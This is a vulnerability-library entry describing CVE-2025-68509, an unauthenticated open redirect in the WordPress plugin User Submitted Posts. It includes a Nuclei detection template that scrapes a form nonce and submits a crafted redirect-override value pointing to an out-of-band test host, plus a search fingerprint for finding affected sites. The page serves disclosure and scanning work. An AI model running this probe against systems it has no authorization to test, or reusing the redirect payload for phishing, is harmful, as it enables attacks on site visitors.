/Vulnerability Library

User Submitted Posts <= 20251121 - Unauthenticated Open Redirect

CVE-2025-68509
Verified

Description

The User Submitted Posts plugin for WordPress is vulnerable to Open Redirect in all versions up to and including 20251121. This is due to insufficient validation on the redirect-override POST parameter. Unauthenticated attackers can redirect users to potentially malicious sites by tricking them into submitting a form.

Severity

Medium

Published Date

February 4, 2026

Template Author

shivam kamboj

CVE-2025-68509.yaml
id: CVE-2025-68509

info:
  name: User Submitted Posts <= 20251121 - Unauthenticated Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The User Submitted Posts plugin for WordPress is vulnerable to Open Redirect in all versions up to and including 20251121. This is due to insufficient validation on the redirect-override POST parameter. Unauthenticated attackers can redirect users to potentially malicious sites by tricking them into submitting a form.
  impact: |
    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.
  remediation:
    Update to the latest version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-submitted-posts/user-submitted-posts-20251121-unauthenticated-open-redirect
    - https://plugins.trac.wordpress.org/changeset?old_path=/user-submitted-posts/tags/20251121&new_path=/user-submitted-posts/tags/20251210
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="usp-nonce"
  tags: cve,cve2025,wordpress,wp-plugin,user-submitted-posts,open-redirect,wp

variables:
  content: "{{to_lower(rand_text_alphanumeric(6))}}"
  username: "{{rand_text_alphanumeric(12)}}"
  email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 'name="usp-nonce"'
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        internal: true
        regex:
          - 'name="usp-nonce"\s+value="([^"]+)"'
        group: 1

  - method: POST
    path:
      - "{{BaseURL}}"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "usp-nonce={{nonce}}&user-submitted-title={{rand_int(10000,99999)}}&user-submitted-content={{content}}&user-submitted-name={{username}}&user-submitted-email={{email}}&user-submitted-url=https://test.com&user-submitted-tags=test&user-submitted-category[]=1&user-submitted-captcha=2&redirect-override=https://oast.live/"

    redirects: false

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.live\/?(\/|[^.].*)?$'
# digest: 490a0046304402204722a4bde44481a5fe3fdc1956ffae7809ba9a27bcd68c0a762f44197de500e8022030b24380c659812537791d4177f39a55d5c16426e0d8246ffa98408f739c98c8:922c64590222798bb761d5b6d8e72950
5.0Severity

CVSS Metrics

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-submitted-posts/user-submitted-posts-20251121-unauthenticated-open-redirecthttps://plugins.trac.wordpress.org/changeset?old_path=/user-submitted-posts/tags/20251121&new_path=/user-submitted-posts/tags/20251210

Remediation Steps

Update to the latest version.